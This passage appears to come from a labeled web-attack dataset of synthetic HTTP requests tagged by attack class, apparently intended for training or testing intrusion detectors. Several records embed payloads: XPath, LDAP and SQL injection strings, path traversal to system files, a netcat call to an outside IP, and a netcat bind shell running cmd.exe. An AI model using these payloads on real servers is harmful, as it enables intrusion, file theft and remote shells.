From: nTromT8u@pzcel.it
If-Modified-Since: Wed, 07 Nov 07 01:16:28 UTC
If-Unmodified-Since: Wed, 11 Apr 07 10:58:54 UTC
If-Match: "r510I.ZUpVG2KuQ"
If-None-Match: "WhfkO2Zn5cSngJUC2Qg"
If-Range: *
Max-Forwards: 6840
MIME-Version: 5.2
Pragma: nomesgt='nsbha5oe'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Ns5wt sihbnas=Atnr6O
Range: -213510,08-017,5-
Referer: /xyee/naEsekt/a5hoslit/0laa5t.pl
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: rhprm/6.5.7
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 908x4326
Via: ezxa/2.8 www.ensa.png, HTTP/1.2 www.osuTred.gif, 4.4 www.9rarqxf.tiff
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 827 128.241.155.90 "rdxPrqmix" "Mon, 08 Aug 05 16:44:17 GMT"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38687
Start - Id: 49145
class: XPathInjection
GET /9e7stdAtooaoar/lOnzFPux88lbe0h-ZB/hfeR.png?seHnssa=reetl%27+++or+++%28i+%3C++++count%28cn%2Fchild%3A%3Atext%28%29%29++++and++j+++%3C+++count%28edgmi%2Fchild%3A%3Acomment%28%29%29++and+k++%3C++count%28dcile%2Fchild%3A%3A*%29+++++%29++++or+%27i0ce%27+%3D++++%27+nmaaR5%27+or HTTP/1.0
Host: www.5aoorD.uk
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.0
Accept-Encoding: *
Accept-Language: jgjie9-cht12sn;q=0.9, twAe-ewdohs;q=0.0
Cache-Control: only-if-cached
Client-ip: 97.222.173.73
Cookie: ddmoct=ik1;ta0=63;tseqbhcnl4ac=90802;thttpdexecl=9480575;ynNetto=oIshutdownesmZ2/zilysWcate
Cookie2: $Version="44"
Date: Tue, 05 May 09 07:23:38 UTC
ETag: W/"SMfC7ySiRTzveMxy"
Expect: cnapd=5nhiuzm;etnii
From: hstr@4dfys6.de
If-Modified-Since: Fri, 19 Aug 05 09:57:37 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:35:32 CET
If-Match: "nX46VXb7gchBvw4ch"
If-None-Match: *
If-Range: "WphlFp474HsF94h-vIJ6"
Max-Forwards: 612
MIME-Version: 0.8
Pragma: he=hEe
Proxy-Authorization: NTLM YXJ1eXBlMHdlNUFlY2V0dHNldWU4dGFoZm5laGxzc2RzTWFlYWFhOXR6
Authorization: hhoen nmCrg=ecche
Range: 4916-
Referer: http://h1AA.fr/2tgs.gz
TE: trailers
Trailer: Host
User-Agent: otluqak (afdNQ@.o; ppo5q9x)
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: FTP/3.4 212.40.5.91:50280
Transfer-Encoding: sois
Upgrade: oredo/3.8, 9ele/6.1
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49145
Start - Id: 41401
class: SqlInjection
PUT /2R_NdYYo8GjMJxOV/ew/7ovQwLRS79tScRCU/itQadnn2sI2ap/xqyY/ryLvRCI3sNWm5Iiz./jtbodye8p3-oIU.asp? HTTP/1.0
Content-Length: 292
Content-Language: oeTn,js,upRiaj6u
Content-Encoding: deflate
Content-Location: http://www.kwn2.cz/iNbdtr/iebea/xbiaisis/roSs3n.tiff
Content-MD5: dDBhaXRhYXp0c3RlbXJ0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 23:12:59 GMT
Last-Modified: Fri, 03 Apr 09 07:19:46 GMT
Host: www.cfrssssu.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: tgnzaln-e3
Cache-Control: no-store
Client-ip: 87.5.203.76
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Mon, 28 Aug 06 20:05:42 CET
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 27 Jul 04 03:36:56 GMT
If-Unmodified-Since: Sat, 18 Mar 06 18:45:56 CET
If-Match: *
If-None-Match: "ikY4LdRx4FgeIqD8dXF"
If-Range: *
Max-Forwards: 3
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic VGRydHNtdDp0YUhnOW84RQ==
Range: 711-
Referer: http://adedEg.st/bmpse/ikhSe.txt
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: mlEnlr1tL (c5m7.iOe; sLWIfxLR1; 0ReiRcTBi)
UA-CPU: 68000
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: 1.2 131.110.131.35:8054, 9.6 124.224.232.163
Transfer-Encoding: ensmi
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

oRwbenaramte=arrolhHsatei)el&8adodqlal=es:elibfE0(xtermxr&auti&tsrhedrtupnii6n=dtaerwahdacceptie9&Qdrt9ihfgerS=83424&scriptSbfQRT@hO=sAd&Rnode1i7g3RiKwp-=aP5&irtas4e0=' +    (   SELECT  TOP    1   tnrOah    FROM    iuRl)  +  '&fnaaeR=7unf&Uuta8=1txtermre&ann=2e2dpca de<

End - Id: 41401
Start - Id: 35501
class: XPathInjection
GET /tfih3dmdiat9ts.cfm?8tiueetosli4h4=995876009&de1ewtlieei8=Edwy&HUlato=eO%5Csiyynbgtu&xyhehenk=iRBwg5NG&aiw=rinnetcat&62ciEdOruenl=e4Ko&w3DOlibygFLphp=%7C1s+bE+o%29T-Aysn&k7IZa=6leooidirigNtad&oTdSdwns=s%29&iz=JsltjLefao&bbcgginf3i5oe=rrw0Uegr5NsoeRari&aei=avge%24&Inmd=98022&pnei9POratyo=7223 HTTP/1.0
Host: www.itetea.cz:635
Connection: keep-alive
Accept: text/*
Accept-Charset: iso-8859-8;q=0.7, x-mac-hebrew;q=0.7, x-mac-ce;q=0.3, windows-1251;q=0.8
Accept-Encoding: *
Accept-Language: cd-etpt;q=0.1, az-ho6Isto6
Cache-Control: no-cache
Client-ip: 71.50.53.20
Cookie: a1setnfgdt=lOR;endneq5=miyoShcutEanzugta;o0=rea8h8d']    |  P    |    //user[   name/text(    )   =  'so
Cookie2: $Version="2"
Date: Fri, 25 Nov 05 20:34:41 CET
Expect: 100-continue
If-Modified-Since: Sat, 15 Aug 09 16:40:53 CET
If-Unmodified-Since: Sun, 11 Dec 05 19:03:11 UTC
If-Match: *
If-None-Match: "JBhl9pWIN7AfmTCvS7l"
If-Range: Fri, 28 Jul 06 12:16:10 GMT
Max-Forwards: 51
MIME-Version: 8.5
Pragma: a=ctp7Enwn
Authorization: NTLM bHNyVWFlb25wZXdrYTJOZGFENHNoaWVvdXBwbWVkdGxkZ1dpdzl0M2o=
Range: 76101-
Referer: http://www.eici.de/zissoays/oeybmpL3/rebanhT/rpWao/mir1r.php
Trailer: Upgrade
User-Agent: Mozilla/5.8 (Windows; U; Windows NT 3.0; ti-no; rv:6.5.1) Gecko/52466185
Via: 0.4 71.64.1.77
Transfer-Encoding: deflate
Warning: 037 www.ramdut.png "awsh" 
X-Forwarded-For: 70.179.167.130
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35501
Start - Id: 49552
class: XPathInjection
GET /Rtqossi/hmcrjkBE@47g.Z0Y/GaQb/bdcr/5EpassthruHqncMUH/dPN/la4eckrtee8truhosow4/rxoQwrAv9APtEo@E/n7ugbrcr9e8mRd8h/uYt3/oUYpvsPojr-.swf?NtHIh_5=6Z-ydN6Xt&BFC@49Ufdmn8=86++++or++1%3C++nru%2FapnGxt%2Fe3uaC%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++++or+77%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 104.167.135.80:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874, euc-kr;q=0.0, x-mac-chinesetrad;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: 4-adEd, utoteHmS-5cto;q=0.3, at7lut-Ie;q=0.8, esk-Eie
Cache-Control: no-transform
Client-ip: 201.175.156.200
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="6"
Date: Tue, 07 Mar 06 02:43:06 UTC
ETag: "hOxU9R0Q9cjkGmii_LTh"
Expect: 100-continue
From: petnihea@07eei4h.cz
If-Modified-Since: Mon, 19 Nov 07 23:21:40 UTC
If-Unmodified-Since: Wed, 22 Sep 04 12:46:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.7
Pragma: uwninaig=4Mgrc
Proxy-Authorization: Digest username="93es"
Authorization: Basic aWFsdHRoOjdvb2lncw==
Range: 6-,-33,78456-
Referer: /1iohrgnn/o7lnebt.shtml
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.1 (X11; U; SunOS sun4u 3.9; i5-do; rv:5.8.8) Gecko/84458382
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: 7.6 140.147.124.7, 2.3 198.92.1.187, 5.7 www.rmatk.jpeg
Transfer-Encoding: compress
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49552
Start - Id: 37095
class: LdapInjection
GET /iwezjSkttcs.html?7orstylePPUum=422%29%28%26%28objectClass%3DFsAS%29%28%7C%28sn+%3D++c8f%29%28cn%3Dfwn0+J*%29%29&bw=102482454 HTTP/1.1
Host: www.vlnia4kot.org:464
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 237.22.129.42
Cookie: ano=s1io;teeewt1Dh7tee=6;lnC5=9
Cookie2: $Version="9"
Date: Fri, 11 Aug 06 09:56:38 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: psotr
From: isenqanI@dizsiba.uk
If-Modified-Since: Fri, 02 May 08 06:17:49 UTC
If-Unmodified-Since: Sun, 09 Jul 06 12:31:02 GMT
If-Match: "vqvFvd-kwWFOLqK"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.7
Pragma: rdrhi=ne4ril
Proxy-Authorization: NTLM dWhtaWVpa29hZHRzbzh3bGlrc3pIdU41eGxpdmFoSDRhYWVsbnM0dQ==
Authorization: Digest uri=http://www.ieofy.fr/etne9/oL1A/s0oe.cfm
Range: 8-29969,-67,432-912142
Referer: http://www.i43hrnt0.be/rran/Stlll/atiuxqaf/offtioh.bin
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 1.3; nf-tn; rv:2.3.6) Gecko/25851145
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 554x588
Via: HTTP/1.1 www.vztiai2.png:67, 5.9 www.rrTtuweh.shtml:0
Transfer-Encoding: ytHgo; ethv=mSnao
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 6212465353435599462
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37095
Start - Id: 39102
class: LdapInjection
POST /ocnnMC6ajwes7vrqu/rasdxnunm5/WO9t/sewarnhU4stora/IacsBelbnssedaefde/fz5/4CisM/Mcn.asmx? HTTP/1.0
Content-Length: 70
Content-Language: eisuwhdx
Content-Encoding: gzip
Content-Location: http://rdev.cz/eetamitr/esa7iOw.shtml
Content-MD5: bG5uN2Flc1B3bm5odDFpbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Apr 04 11:45:31 CET
Last-Modified: Tue, 12 Jan 10 14:40:05 UTC
Host: www.itENhetQo.uk
Connection: close
Accept: application/*, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 91.76.159.57
Cookie: hhr=ncrFsn3w;aormGbwinntT=jc2;litbd=)   (   |    (   cn=*o 'brien*    )(mail   =*o    'brien*  ) 
Cookie2: $Version="304"
Date: Thu, 30 Dec 04 12:20:44 GMT
ETag: W/"YEOwkJ9u8T.CQwwtU3"
Expect: 100-continue
If-Modified-Since: Fri, 03 Jul 09 23:49:46 CET
If-Unmodified-Since: Fri, 11 Feb 05 05:19:01 CET
If-Match: "eU3mWUvmOGQ55CHHT@9"
If-None-Match: "R__4-VTz@cMXhiPv"
If-Range: Thu, 11 Dec 08 06:08:11 CET
Max-Forwards: 0612
MIME-Version: 0.3
Pragma: Doenwim=eouedH
Proxy-Authorization: Digest nc=76862bbc
Authorization: Digest qop=auth-int
Range: 24-1,306163-10
Referer: /rSse/ubzu1.css
TE: deflate,trailers
Trailer: User-Agent
User-Agent: ewefnmcHa
UA-Color: color8
Via: ycinl/2.9 www.istq.png, dtcmne/1.6 161.224.97.34
Transfer-Encoding: identity
X-Forwarded-For: 253.112.146.139
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2st8e=7&ln=mr1'whereeAst0d&lereregboehrse0=8&wY2=r  ti<brmochayoe1

End - Id: 39102
Start - Id: 36684
class: OsCommanding
GET /peasuOgKzU3iX/tqAs/oYxhaa7iJwJ4yhq.Jm/elyn9Onoar/2script/8_hVFXZsTEKv.png?nnnMdti=xyDncnsefit&nlh7iceod=sBnMAObAP4&g8f=LHeni2Yed7eliet&x3atoxtepaen=pr5E.&dJBTmBf2wfB=n%29&AAG.body=5165&0hsdheqte9=pdEhRr5pinaeefh&hex2pHeYh=3&ahA=95647713&5aeeeaGs0=heau%3F%25t6e6ldtIartv1m&desd7R=odmxlo%26%3Feeo&G@J_b1g=ts%3A7t6counE%29&rtN=aldqi8&micZw=6f%24spst%3En+ HTTP/1.0
Host: www.e6v1iivn3.be
Connection: close
Accept: */*;q=0.3
Accept-Charset: euc-cn, macintosh;q=0.3, koi8
Accept-Encoding: gzip;q=0.6
Accept-Language: *;q=0.0
Cache-Control: ehUZ='tqNermoH'
Client-ip: 2.169.236.90
Cookie: gnj=ca;hcriq1neth=68239;Dsfrom1vQmD=it8di;LiuaR3=nlwtauI246a;eeecafq=|     /usr/bin/nc     -vvv   188.230.217.19    80%00;meontpzm6mxn=grsdupthmidle
Cookie2: $Version="2"
Date: Tue, 10 May 05 16:14:55 UTC
ETag: "wy@OzR52T2wQnQtS"
Expect: 100-continue
From: lilt@OlQ9nomrvy.gov
If-Modified-Since: Sat, 02 Aug 08 11:04:42 UTC
If-Unmodified-Since: Sun, 05 Jul 09 21:07:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 23 Mar 10 15:38:48 UTC
Max-Forwards: 7275
Pragma: naTsira='r'
Authorization: Digest nc=fd1AFac9
Range: 54-9,-814311,72-
Referer: /rsdhr/oau2.sh
TE: trailers
User-Agent: Mozilla/1.2 (compatible; 1nete1h; Unix; gotbjd9n; ressnyeen; Tea5xHUu)
UA-Disp: 6716,830,16
UA-Pixels: 0658x8272
Via: 0.1 32.210.40.144
Transfer-Encoding: identity
Warning: 690 185.253.94.244 "Garhr" "Tue, 09 Jan 07 24:46:57 UTC"
X-Forwarded-For: 4.27.255.43
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36684
Start - Id: 36239
class: PathTransversal
GET /tqratcoPgfIft1/nl/sWwlhS5C/hayi/aL7.8qyN1GJw1hLeD/eteyS2lXNcYCd3R.M.X/sO/eNCl1.cgi? HTTP/1.1
Host: 8.10.90.222
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-turkish, iso-8859-8, x-mac-cyrillic;q=0.4
Accept-Encoding: \.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Accept-Language: 1Nt-tiMihfr;q=0.4, onI-o;q=0.1, e-dhsgimeo;q=0.7, deesees-drsnEr;q=0.7, iimi-oero;q=0.1
Cache-Control: max-stale
Client-ip: 238.212.43.2
Cookie: sbnsapeuot=]nammqaf 7;.cqm9yUaylocationJi=0183110375;dQe9u=81;tOu=10774963;pio6=041474
Cookie2: $Version="74"
Date: Wed, 21 Jul 04 21:35:29 GMT
ETag: W/"5_tSMbho.kuGbwC9G"
From: m2sjud@ksr7jeno.com
If-Modified-Since: Tue, 08 Dec 09 03:54:41 UTC
If-Unmodified-Since: Mon, 26 Jan 04 03:08:45 GMT
If-Match: *
If-None-Match: "Dy-w8G6U@_Wri-Rj-W"
If-Range: *
Max-Forwards: 230
Pragma: no-cache
Proxy-Authorization: Basic ZGZPb3JzejY6dEhubXc=
Authorization: btBg udfn=hcmmt
Referer: http://tallqns.org/rtoeuo8/Seotmge.dll
TE: chunked
Trailer: Expect
User-Agent: Mozilla/7.3 (compatible; nrbKlnre; Open BSD i386; jwsa; mva3b1; lt3peF)
Via: 5.8 www.iErjere.png
Transfer-Encoding: compress
Warning: 389 www.4tEw.tiff "a165" "Fri, 02 May 08 03:42:15 UTC"

null

End - Id: 36239
Start - Id: 35632
class: XPathInjection
GET /n6LzuTbh9/iDaS1Xu-x0B1Nrjai/oPJAl/dB06KSUXd/8hr-G@tS0/zJD62y@hH.Q@rL/ynenuooesneownw9/3ealctsix45eotisb0/pB2DIXV2-2qe7hDx@/a7DaenpXno.jpeg?xoiis6e=lllSqgE%27+++or+1%3C+++t%2Fdaeah%2Ft%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D686%5D+++or+%27Nmtesob%27+++%3D++++%27 HTTP/1.1
Host: 11.6.187.120
Connection: keep-alive
Accept: image/*;q=0.6, application/*, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Wed, 30 Jul 08 17:39:47 CET
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: MaheEaa=jmnFein;sneisk=ieirsrvw
From: rzin8cri@efHTe5.be
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Mon, 23 Oct 06 12:40:57 CET
If-Match: *
If-None-Match: *
If-Range: "wY2i@GJnd53f1w3_fb5"
Max-Forwards: 285
MIME-Version: 6.3
Pragma: ih='grh'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Digest cnonce="tnexai"
Range: -38,162-85,-031
Referer: http://www.veluj.de/srco.shtml
TE: trailers
Trailer: Upgrade
User-Agent: seDutob6rsx
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: 7.6 www.oxfmgklo.tiff
Transfer-Encoding: gzip
Upgrade: eclhdI/8.8, x4oas2/8.6, oieb/7.4
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35632
Start - Id: 41737
class: SqlInjection
GET /eO3UIULu-7qfXqc2/15bisgkiebarnay/RkOV1VpcqallNH0meta/qaaEe4a7errnlEiaag/lMZpU1gpjGT82ea0i.i/oEtdttets5c9szobCa/aUQRi_ms2VAwDFpAI.msf?idUwexhs=7300&81ooHEie=lPY&_grsM@=aLbPFxKBNN&tNioyo7nar=9898&eiitdtbwidc=4880&LvIsxrz0ZnT=82&o4rbsonoAulaiRe=eWQy&hehMlmp=07645&93s=8&7copyp7yMgr4O=%7Cs06br3+hos9aqesamu&meeet=oo%2Befsmhttpsa-nacceptCascriptnoiframe&7D7e8Xeue=00&0enel2n6nmijap=1274&EaNNr@o=%27++%2F**%2F++OR+%2F**%2F%27%27+%3D++%27&che8eoei5=theiD0eohsnst HTTP/1.1
Host: 206.230.212.66
Connection: lseooa
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 136.31.14.94
Cookie: yanthse34dK7wi0=an4igm~2athttcuopt%u];0aEtihdepyf=j;getnAnhoeid1a=tYIf;HkRusrdNmBEF=mrtkHtha1nupan;wiaPeemOtrt=EtLft>;Eat8ilaenis=0426
Cookie2: $Version="5"
Date: Tue, 01 Sep 09 24:06:46 UTC
ETag: "3RzLyYlW.gVQq0ScRi"
Expect: 100-continue
From: jMelerog@d2JLz3sO.it
If-Modified-Since: Mon, 17 Oct 05 04:17:58 UTC
If-Unmodified-Since: Fri, 30 Jan 04 10:37:53 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: "l@zlvyPiyamtfnCLEf6"
Max-Forwards: 8
MIME-Version: 5.1
Pragma: eet='ye7siss'
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Digest nc=14b59DcB
Range: -9158,6593-962,-115779
Referer: /uk1oj/tat2dtte.dll
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 8.2; da-en; rv:7.3.3) Gecko/03729645
UA-CPU: 68000
UA-Disp: 965,4025,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: HTTP/2.7 42.193.108.231:35251, 9.3 www.Unmeh.css, 5.0 7.229.59.159
Transfer-Encoding: compress
Upgrade: OcN/3.5, 0iet/4.6, opaid/9.4, RiWniu/3.2, egwh/3.6
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41737
Start - Id: 49012
class: XPathInjection
GET /vtdsrmrrn/6herhrbeatdoiNassie/doapweranwi/rjgm023s/ovb35RM.nsf?esn=3383631&rro2=hgdsXy&iii1nicylp=ta%27+or+6+++++%3C++count%28path%2Fchild%3A%3A*%29+++or++++%27garlifaa%27+%3D+%27&smoentsa5awr3hc=9RXEPNs&msiAe=4t0-cfeA+81pobf HTTP/1.0
Host: 82.114.203.253
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-jp;q=0.9, iso-10646-ucs-2, x-mac-japanese, windows-1254, koi8-r;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=53688
Client-ip: 219.107.221.160
Cookie: @VFautoexeclBOQnph-R=00
Cookie2: $Version="22"
Date: Tue, 18 Nov 08 21:20:58 CET
ETag: W/"A_OF1TsXBNTJNorCOij"
Expect: EtKttam=ESeh
From: w6wr@nytn.it
If-Modified-Since: Sun, 10 Aug 08 01:40:53 GMT
If-Unmodified-Since: Fri, 20 May 05 14:12:56 GMT
If-Match: *
If-None-Match: "T_nGdQBeyNGel-J1JHQ"
If-Range: *
Max-Forwards: 7828
MIME-Version: 9.3
Pragma: eT=eieet
Proxy-Authorization: NTLM aXNlcm54Q3Nsa2FvbmVOaWlvQWV0bG9uMXhqbHdvZTg=
Authorization: Basic YkVybmVyUjphZDlwZQ==
Range: -31
Referer: http://www.ccsyo.net/oerx.gif
TE: deflate,deflate
Trailer: From
User-Agent: 0oot8Uhi0mhihna
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3985x064
Via: FTP/5.6 70.77.47.39
Transfer-Encoding: ams4oY; 9Rqemar=5rAt7y5F
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 584 www.to8Zs.jpeg "prpRute" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49012
Start - Id: 36059
class: PathTransversal
GET /srvmyte7ytaAk2ka/srwqtssaohafpsVi/HHFhtpassFnK-pB/thcKx/aH4/n@fuYF19-/BNmochaq4FCEincludes7Cl/cperlPH_loeIN18u.shtml?amFe7rmte=..%2F..%2F..%2FWINNT%2Fautoexec.bat&Nr1tL=0&ais=%28tMwidle1awsar HTTP/1.0
Host: www.landrna.biz:80
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: ks_c_5601-1987, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 67.249.93.38
Cookie: orrQsaiu3=mrinnlbxsvcnpfB;isgrT=480840097;JmD8H4mA_4Tshutdown=1939
Cookie2: $Version="79"
Date: Thu, 01 Apr 10 11:48:44 CET
ETag: W/"8CezCdd-SQ6sdgh"
Expect: eeafeono
From: Odatte@nazuaen.net
If-Modified-Since: Fri, 25 Feb 05 23:34:02 CET
If-Unmodified-Since: Fri, 28 Aug 09 23:14:57 UTC
If-Match: "gmE.laLeS_yOTUER8v"
If-None-Match: *
If-Range: Sat, 20 Feb 10 23:18:38 CET
Max-Forwards: 3389
MIME-Version: 5.0
Pragma: De=5idT
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -31,-3,49859-
Referer: http://sttOqrre.st/hsamtoa.php
TE: deflate
Trailer: Warning
User-Agent: Mozilla/3.0 (compatible; Konqueror/4.2; Open BSD i386; e1lielcay)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: HTTP/3.8 www.libdI.gif
Transfer-Encoding: gzip
Upgrade: ndmi/3.1, iziw/1.4
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36059
Start - Id: 42890
class: OsCommanding
GET /noFHY4v6eRldrJVRz8/hg7NtHnz9bB@nuM4f/nuenrytnIf/tsir2zgR8bQXx7Sxd8/LYBHDidMy/opn.htm?cnnhz3Se=%7C++shell%28+++%22cmd++++%2Fc++c%3AInetpubwwwrootMSISSnc.exe++-l+-p+++2543+-t+++++-e++cmd.exe++%22%29+++%7C++%27 HTTP/1.1
Host: www.vfc3kn.it:80
Connection: urCoiah
Accept: image/*
Accept-Charset: windows-1257;q=0.8, iso-8859-3, koi8-r, windows-1252
Accept-Encoding: deflate;q=0.0, deflate, gzip;q=0.9, compress, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 133.170.78.11
Cookie: E6l9=ul;ncadmineerndtriro1;ssneouIw=xr4e;xsb3ie4e=0;ui=p%sor;r0xG3I6ox=mtt=a;leg2sdozgFIzaqi=ftp&
Cookie2: $Version="01"
Date: Sun, 14 Oct 07 11:32:49 UTC
ETag: W/"hxVAw7ycEWOOXXaqjbU"
Expect: tlgm
From: 2yoeb@2treday.de
If-Modified-Since: Fri, 27 Feb 04 20:04:39 UTC
If-Unmodified-Since: Fri, 22 Aug 08 06:36:37 UTC
If-Match: *
If-None-Match: "6wtTa@W0QKBb.SS3c2"
If-Range: Thu, 22 Apr 10 20:29:19 CET
Max-Forwards: 90
MIME-Version: 9.3
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: Basic bWF0UzppYXVpYWlsdA==
Range: -057067,0-214264
Referer: /faxihege/oaee/pjRqerd/dlLAdm.tar
TE: chunked
Trailer: Upgrade
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 3.1; pa-il; rv:1.7.1) Gecko/99106333
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4835x5695
Via: 5.0 242.240.123.253, 3.1 104.254.236.200:42, 2.5 165.19.12.44
Transfer-Encoding: gzip
Upgrade: dal3ei/8.1, medohh/7.9, vcief/8.1, tln78a/9.5, fsssme/7.1
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 7523333494346880207
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42890
Start - Id: 40150
class: SSI
